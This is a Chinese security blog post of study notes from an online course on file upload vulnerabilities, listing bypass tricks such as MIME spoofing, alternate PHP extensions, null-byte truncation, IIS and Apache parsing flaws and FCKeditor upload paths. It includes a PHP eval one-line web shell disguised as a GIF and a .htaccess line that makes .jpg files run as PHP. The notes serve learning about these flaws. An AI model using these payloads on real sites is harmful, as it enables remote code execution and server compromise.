<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Notes,Web,Upload," />





  <link rel="alternate" href="/atom.xml" title="Cytosineの有被小窝~" type="application/atom+xml" />






<meta name="description" content="i春秋上一个课程的笔记，课程地址：非法文件上传漏洞技术解析及防御（11课时） 用强网杯泄露邮箱时候赠的会员就可以免费看，搭配后面的实验，感觉学下来收获还是蛮大的。 前端验证想怎么改怎么改了吧~ 改MIME类型 MIME:客户端软件，区分不同种类的数据，例如web浏览器就是通过MIME类型来判断文件是GIF图片，还是可打印的PostScript文件。web服务器使用MIME来说明发送数据的种类， w">
<meta name="keywords" content="Notes,Web,Upload">
<meta property="og:type" content="article">
<meta property="og:title" content="文件上传简要笔记">
<meta property="og:url" content="https://lovegood.github.io/2018/08/08/note-upload-ichunqiu/index.html">
<meta property="og:site_name" content="Cytosineの有被小窝~">
<meta property="og:description" content="i春秋上一个课程的笔记，课程地址：非法文件上传漏洞技术解析及防御（11课时） 用强网杯泄露邮箱时候赠的会员就可以免费看，搭配后面的实验，感觉学下来收获还是蛮大的。 前端验证想怎么改怎么改了吧~ 改MIME类型 MIME:客户端软件，区分不同种类的数据，例如web浏览器就是通过MIME类型来判断文件是GIF图片，还是可打印的PostScript文件。web服务器使用MIME来说明发送数据的种类， w">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-10-22T07:38:49.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="文件上传简要笔记">
<meta name="twitter:description" content="i春秋上一个课程的笔记，课程地址：非法文件上传漏洞技术解析及防御（11课时） 用强网杯泄露邮箱时候赠的会员就可以免费看，搭配后面的实验，感觉学下来收获还是蛮大的。 前端验证想怎么改怎么改了吧~ 改MIME类型 MIME:客户端软件，区分不同种类的数据，例如web浏览器就是通过MIME类型来判断文件是GIF图片，还是可打印的PostScript文件。web服务器使用MIME来说明发送数据的种类， w">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.3',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://lovegood.github.io/2018/08/08/note-upload-ichunqiu/"/>





  <title>文件上传简要笔记 | Cytosineの有被小窝~</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Cytosineの有被小窝~</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">智能是人类未来之光，安全是人类基本需求。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
            cd ~
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
            uname -a
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
            ls -al post
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://lovegood.github.io/2018/08/08/note-upload-ichunqiu/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Cytosine">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.webp">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cytosineの有被小窝~">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">文件上传简要笔记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-08-08T19:51:22+08:00">
                2018-08-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>i春秋上一个课程的笔记，课程地址：<a href="https://www.ichunqiu.com/course/78" target="_blank" rel="external">非法文件上传漏洞技术解析及防御（11课时）</a></p>
<p>用强网杯泄露邮箱时候赠的会员就可以免费看，搭配后面的实验，感觉学下来收获还是蛮大的。</p>
<h1 id="前端验证"><a href="#前端验证" class="headerlink" title="前端验证"></a>前端验证</h1><p>想怎么改怎么改了吧~</p>
<h1 id="改MIME类型"><a href="#改MIME类型" class="headerlink" title="改MIME类型"></a>改MIME类型</h1><blockquote>
<p><strong>MIME</strong>:客户端软件，区分不同种类的数据，例如web浏览器就是通过MIME类型来判断文件是GIF图片，还是可打印的PostScript文件。web服务器使用MIME来说明发送数据的种类， web客户端使用MIME来说明希望接收到的数据种类。<br>（——摘自《警惕您站上的MIME类型绕过漏洞》实验手册）</p>
</blockquote>
<p>请求包中<code>Content-Type</code>字段，改成允许上传的字段，如：<code>image/jpg</code></p>
<h1 id="改扩展名"><a href="#改扩展名" class="headerlink" title="改扩展名"></a>改扩展名</h1><p>php, php2, php3, php4, php5 等</p>
<h1 id="在图片末尾插入一句话"><a href="#在图片末尾插入一句话" class="headerlink" title="在图片末尾插入一句话"></a>在图片末尾插入一句话</h1><p>直接在图片后面加一句话</p>
<p>或者：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">GIF89a</div><div class="line">&lt;?php @eval($_POST[&apos;1&apos;]); ?&gt;</div></pre></td></tr></table></figure>
<h1 id="空字节截断目录路径检测"><a href="#空字节截断目录路径检测" class="headerlink" title="空字节截断目录路径检测"></a>空字节截断目录路径检测</h1><ol>
<li>burp抓包</li>
<li><code>uploadimg/1.php</code>改为<code>uploadimg/1.php .jpg</code></li>
<li>切到hex模式，把代表空格的<code>20</code>改成代表空字节的<code>00</code></li>
</ol>
<h1 id="IIS6-0目录路径解析漏洞"><a href="#IIS6-0目录路径解析漏洞" class="headerlink" title="IIS6.0目录路径解析漏洞"></a>IIS6.0目录路径解析漏洞</h1><h2 id="asp-xxx-jpg，会被IIS当作ASP文件来解析执行"><a href="#asp-xxx-jpg，会被IIS当作ASP文件来解析执行" class="headerlink" title="*.asp/xxx.jpg，会被IIS当作ASP文件来解析执行"></a><code>*.asp/xxx.jpg</code>，会被IIS当作ASP文件来解析执行</h2><p>请求<code>/aaa.asp/xxxx.jpg</code><br>从头部查找查找<code>.</code>, 得到<code>.asp/xxxx.jpg</code><br>查找<code>/</code>, 如果有则内存截断，所以<code>/aaa.asp/xxxx.jpg</code>会当做<code>/aaa.asp</code>进行解析</p>
<h2 id="php-xxx-jpg，会被IIS当作PHP文件来解析执行"><a href="#php-xxx-jpg，会被IIS当作PHP文件来解析执行" class="headerlink" title="*.php;xxx.jpg，会被IIS当作PHP文件来解析执行"></a><code>*.php;xxx.jpg</code>，会被IIS当作PHP文件来解析执行</h2><p>请求<code>/aaa.php;xxx.jpg</code><br>从头部查找查找<code>.</code>号，获得<code>.php;xxx.jpg</code><br>查找<code>;，,</code>, 如果有则内存截断，所以<code>/aaa.php;xxx.jpg</code>会当做<code>/aaa.php</code>进行解析</p>
<h1 id="ISS解析漏洞"><a href="#ISS解析漏洞" class="headerlink" title="ISS解析漏洞"></a>ISS解析漏洞</h1><p><code>*.asp</code>文件夹中的文件，会以asp的格式进行解析</p>
<h1 id="Apache站上的解析缺陷"><a href="#Apache站上的解析缺陷" class="headerlink" title="Apache站上的解析缺陷"></a>Apache站上的解析缺陷</h1><p>不知道如何解析扩展名，就会往前找扩展名，直到找到能解析的~</p>
<h1 id="htaccess文件上传解析漏洞"><a href="#htaccess文件上传解析漏洞" class="headerlink" title="htaccess文件上传解析漏洞"></a>htaccess文件上传解析漏洞</h1><p>以php的方式解析jpg后缀的文件:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">.htaccess</div><div class="line">AddType  application/x-httpd-php  .jpg</div></pre></td></tr></table></figure>
<p>先上传.htaccess，然后再传一句话</p>
<h1 id="FCK编辑器"><a href="#FCK编辑器" class="headerlink" title="FCK编辑器"></a>FCK编辑器</h1><p>识别版本，然后找对应版本的上传点地址</p>
<h2 id="查看FCK版本地址："><a href="#查看FCK版本地址：" class="headerlink" title="查看FCK版本地址："></a>查看FCK版本地址：</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">FCKeditor/_whatsnew.html    更新日志地址</div><div class="line">FCKeditor/_samples/default.html 编辑器地址</div></pre></td></tr></table></figure>
<h2 id="FCK2-4-2上传点地址："><a href="#FCK2-4-2上传点地址：" class="headerlink" title="FCK2.4.2上传点地址："></a>FCK2.4.2上传点地址：</h2><ul>
<li>FCKeditor/editor/filemanager/browser/default/connectors/test.html</li>
<li>FCKeditor/editor/filemanager/upload/test.html</li>
</ul>
<h2 id="FCK2-6-6上传点地址："><a href="#FCK2-6-6上传点地址：" class="headerlink" title="FCK2.6.6上传点地址："></a>FCK2.6.6上传点地址：</h2><ul>
<li>FCKeditor/editor/filemanager/connectors/test.html</li>
<li>FCKeditor/editor/filemanager/connectors/uploadtest.html</li>
</ul>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>窝很可爱，请给窝钱</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>赞赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechat.png" alt="Cytosine 微信支付"/>
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="Cytosine 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Notes/" rel="tag"># Notes</a>
          
            <a href="/tags/Web/" rel="tag"># Web</a>
          
            <a href="/tags/Upload/" rel="tag"># Upload</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/07/30/translation-infected-pdf-extract-payload/" rel="next" title="[翻译]如何从恶意PDF中提取payload?">
                <i class="fa fa-chevron-left"></i> [翻译]如何从恶意PDF中提取payload?
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/08/09/Installation-mac-terminal-proxy/" rel="prev" title="Mac设置终端过代理">
                Mac设置终端过代理 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.webp"
                alt="Cytosine" />
            
              <p class="site-author-name" itemprop="name">Cytosine</p>
              <p class="site-description motion-element" itemprop="description">智能是人类未来之光，安全是人类基本需求</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">26</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">35</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          <div class="links-of-author motion-element">
            
              
                <span class="links-of-author-item">
                  <a href="https://github.com/Lovegood" target="_blank" title="GitHub">
                    GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://www.zhihu.com/people/CytosineLovegood/activities" target="_blank" title="知乎">
                    知乎</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://zhuanlan.zhihu.com/dashijian" target="_blank" title="安全大事件">
                    安全大事件</a>
                </span>
              
                <span class="links-of-author-item">
                  <a href="https://xuptsec.github.io/" target="_blank" title="XUPTSEC-blog">
                    XUPTSEC-blog</a>
                </span>
              
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                from dalao import
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://exp101t.blogspot.com/" title="Murasaki" target="_blank">Murasaki</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://pcat.cnblogs.com/" title="pcat" target="_blank">pcat</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://flygon.net/" title="飞龙" target="_blank">飞龙</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ju5tw4nty0u.top/" title="ju5tw4nty0u" target="_blank">ju5tw4nty0u</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://webdog.ml/" title="grt1st" target="_blank">grt1st</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.k0rz3n.com/" title="K0rz3n" target="_blank">K0rz3n</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://skysec.top/" title="一叶飘零" target="_blank">一叶飘零</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.lovei.org/" title="腹黑" target="_blank">腹黑</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://sec2hack.com/" title="Wfox" target="_blank">Wfox</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.codemonster.cn/" title="Xishir" target="_blank">Xishir</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://eternalsakura13.com/" title="Sakura" target="_blank">Sakura</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://math1as.com/" title="Math1as" target="_blank">Math1as</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.thecosmos.cn/" title="Cosmos" target="_blank">Cosmos</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.csdn.net/whklhhhh" title="奈沙夜影" target="_blank">奈沙夜影</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.csdn.net/PeterZ1997/" title="PeterZ" target="_blank">PeterZ</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.virzz.com/" title="Virink" target="_blank">Virink</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.changwei.me/" title="昌维" target="_blank">昌维</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://white.xmutsec.com" title="White" target="_blank">White</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://cismon.net/" title="CismonX" target="_blank">CismonX</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.lsafe.org/" title="lixin" target="_blank">lixin</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://wzsite.cn/" title="Wz" target="_blank">Wz</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.blogsir.com.cn/" title="江sir" target="_blank">江sir</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://greyd0g.github.io/" title="greyd0g" target="_blank">greyd0g</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://brucetg.github.io/" title="Brucetg" target="_blank">Brucetg</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.get1t.cn/" title="FraMeQ" target="_blank">FraMeQ</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.smallflower.xin/" title="小花" target="_blank">小花</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://iosmosis.github.io/" title="iosmosis" target="_blank">iosmosis</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://processor.pub/" title="Processor" target="_blank">Processor</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.lmxspace.com/" title="l1nk3r" target="_blank">l1nk3r</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.evi1s.com/index.php/links.html" title="Map1e" target="_blank">Map1e</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前端验证"><span class="nav-number">1.</span> <span class="nav-text">前端验证</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#改MIME类型"><span class="nav-number">2.</span> <span class="nav-text">改MIME类型</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#改扩展名"><span class="nav-number">3.</span> <span class="nav-text">改扩展名</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#在图片末尾插入一句话"><span class="nav-number">4.</span> <span class="nav-text">在图片末尾插入一句话</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#空字节截断目录路径检测"><span class="nav-number">5.</span> <span class="nav-text">空字节截断目录路径检测</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#IIS6-0目录路径解析漏洞"><span class="nav-number">6.</span> <span class="nav-text">IIS6.0目录路径解析漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#asp-xxx-jpg，会被IIS当作ASP文件来解析执行"><span class="nav-number">6.1.</span> <span class="nav-text">*.asp/xxx.jpg，会被IIS当作ASP文件来解析执行</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#php-xxx-jpg，会被IIS当作PHP文件来解析执行"><span class="nav-number">6.2.</span> <span class="nav-text">*.php;xxx.jpg，会被IIS当作PHP文件来解析执行</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ISS解析漏洞"><span class="nav-number">7.</span> <span class="nav-text">ISS解析漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Apache站上的解析缺陷"><span class="nav-number">8.</span> <span class="nav-text">Apache站上的解析缺陷</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#htaccess文件上传解析漏洞"><span class="nav-number">9.</span> <span class="nav-text">htaccess文件上传解析漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#FCK编辑器"><span class="nav-number">10.</span> <span class="nav-text">FCK编辑器</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#查看FCK版本地址："><span class="nav-number">10.1.</span> <span class="nav-text">查看FCK版本地址：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#FCK2-4-2上传点地址："><span class="nav-number">10.2.</span> <span class="nav-text">FCK2.4.2上传点地址：</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#FCK2-6-6上传点地址："><span class="nav-number">10.3.</span> <span class="nav-text">FCK2.6.6上传点地址：</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cytosine</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a></div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  









<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>



  





  

  

  

  
  

  

  

  

</body>
</html>
